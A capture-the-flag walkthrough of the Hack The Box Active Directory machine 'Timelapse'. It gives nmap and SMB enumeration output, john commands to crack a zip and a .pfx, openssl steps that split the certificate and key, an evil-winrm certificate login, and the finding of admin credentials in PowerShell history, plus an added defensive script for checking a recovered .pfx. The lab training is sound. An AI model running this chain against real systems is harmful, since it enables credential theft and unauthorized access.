HTB Timelapse Walkthrough

Alex Rodriguez
Dec 27, 2023


Introduction

In this post, I dive into “Timelapse,” an easy-rated Active Directory machine from Hack The Box. I’ll share a straightforward account of my process, from initial enumeration to final privilege escalation, reflecting on the practical steps and methodologies I used.

NMAP SCAN

nmap -sC -p0-65535 -Pn -sV --stats-every 10s -T4 10.10.11.152
Host is up (0.069s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-15 07:10:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-04-15T07:12:29+00:00; +8h16m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
51534/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h16m34s, deviation: 0s, median: 8h16m34s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-15T07:11:49
|_ start_date: N/A

SMB Enumeration

An Nmap script scan indicated that the `Guest` SMB account is enabled on the target machine.

nmap -Pn -d --script=smb-enum-users -p 445 10.10.11.152
NSE: Starting smb-enum-users against 10.10.11.152.
NSE: [smb-enum-users 10.10.11.152] SMB: Added account '' to account list
NSE: [smb-enum-users 10.10.11.152] SMB: Added account 'guest' to account list
NSE: [smb-enum-users 10.10.11.152] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [smb-enum-users 10.10.11.152] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: Finished smb-enum-users against 10.10.11.152.

Accessing the ‘Shares’ Directory

Listing the machine’s shares showed the standard administrative and domain shares, but the non-default `Shares` share caught my attention.

smbclient -L 10.10.11.152

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Upon connecting to the ‘Shares’ SMB share, I discovered a directory named ‘Dev’ containing a .zip file named ‘winrm_backup’. I downloaded the file locally to take a look at it.

User Enumeration

I utilized Metasploit’s auxiliary/scanner/smb/smb_lookupsid module to enumerate users on the target machine, successfully identifying several user accounts.

Cracking the Backup File

The ‘.zip’ file was password-protected, so I extracted its hash using John the Ripper (JtR) with the command:

zip2john winrm_backup.zip > zip.hash

Then, I cracked the hash offline using JtR:

john --wordlist=rockyou.txt zip.hash > password.txt

Analyzing the .pfx File

The .zip file contained a .pfx file: a password-protected PKCS#12 bundle that typically holds an X.509 certificate (with its public key) together with the matching private key. Those two components are exactly what certificate-based authentication to a service such as WinRM over HTTPS requires. By splitting the .pfx into a `.pem` certificate and a `.key` private key, the private key can be used as an alternate authentication mechanism: the service accepts the certificate in place of a password, so whoever holds the key can authenticate as the mapped user and move laterally without ever needing that account’s password. A backed-up .pfx left on a readable share is therefore as sensitive as the credential it stands in for.

Acquiring the hash of the `.pfx` file:

pfx2john legacyy_dev_auth.pfx > pfxhash.hash

Cracking the hash offline:

john --wordlist=rockyou.txt pfxhash.hash > pfxcracked.txt

Splitting the `.pfx` file into `.pem` and `.key`:

openssl pkcs12 -in legacyy_dev_auth.pfx -out privateKey.key -nocerts -nodes

openssl pkcs12 -in legacyy_dev_auth.pfx -out certificate.pem -nokeys -clcerts
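As an added example (not from the original post), the following shell script packs a constructed self-signed certificate and key into a throwaway .pfx, then splits it with the same openssl calls used above and checks what a responder would want to know about a bundle recovered from a share: whether the private key really belongs to the certificate, whether the certificate carries the Client Authentication EKU, and when it expires. The file names, the subject `example-dev-auth` and the password `testpass` are all constructed.

```shell
#!/bin/sh
# Added example, not the post's own commands: build a throwaway PKCS#12
# bundle from constructed material, then split and sanity-check it.
set -eu
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed test material: a self-signed certificate carrying the
# Client Authentication EKU plus its key, exported with password "testpass".
make_test_pfx() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
    -subj "/CN=example-dev-auth" -addext "extendedKeyUsage=clientAuth" \
    -keyout "$WORK/test.key" -out "$WORK/test.crt" 2>/dev/null
  openssl pkcs12 -export -in "$WORK/test.crt" -inkey "$WORK/test.key" \
    -out "$WORK/test.pfx" -passout pass:testpass
}

# Split a .pfx (same openssl calls as in the post), print subject, expiry
# and EKU, and report MATCH only if the key's public half equals the
# certificate's public key. Returns non-zero on a bad password or mismatch.
inspect_pfx() {
  pfx=$1; pass=$2
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes \
    -out "$WORK/privateKey.key" 2>/dev/null || { echo UNPACK-FAILED; return 1; }
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nokeys -clcerts \
    -out "$WORK/certificate.pem" 2>/dev/null || { echo UNPACK-FAILED; return 1; }
  openssl x509 -in "$WORK/certificate.pem" -noout -subject -enddate
  # No EKU line means the cert was never meant for client authentication.
  openssl x509 -in "$WORK/certificate.pem" -noout -text \
    | grep -A1 'Extended Key Usage' || echo "no EKU present"
  # Compare SubjectPublicKeyInfo hashes: identical iff key and cert belong together.
  cert_pub=$(openssl x509 -in "$WORK/certificate.pem" -noout -pubkey | openssl sha256)
  key_pub=$(openssl pkey -in "$WORK/privateKey.key" -pubout 2>/dev/null | openssl sha256)
  if [ "$cert_pub" = "$key_pub" ]; then echo MATCH; else echo MISMATCH; return 1; fi
}

# Stand-alone run: build the sample bundle and inspect it.
make_test_pfx
inspect_pfx "$WORK/test.pfx" testpass
```

The same `inspect_pfx` check applied to a real recovered bundle tells you immediately whether it is a usable client-auth credential that needs revoking.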

Initial Access via WINRM

For initial access over WinRM (HTTPS on port 5986, as seen in the scan), I used evil-winrm with the certificate and private key extracted from ‘legacyy_dev_auth.pfx’ to log in as the ‘legacyy’ user.

evil-winrm -S -i 10.10.11.152 -u legacyy -c certificate.pem -k privateKey.key

Privilege Escalation

I discovered the administrator's credentials within the PowerShell history of user 'legacyy', located at:

C:\Users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline

This discovery allowed me to authenticate with the administrator's password through WINRM using evil-winrm.
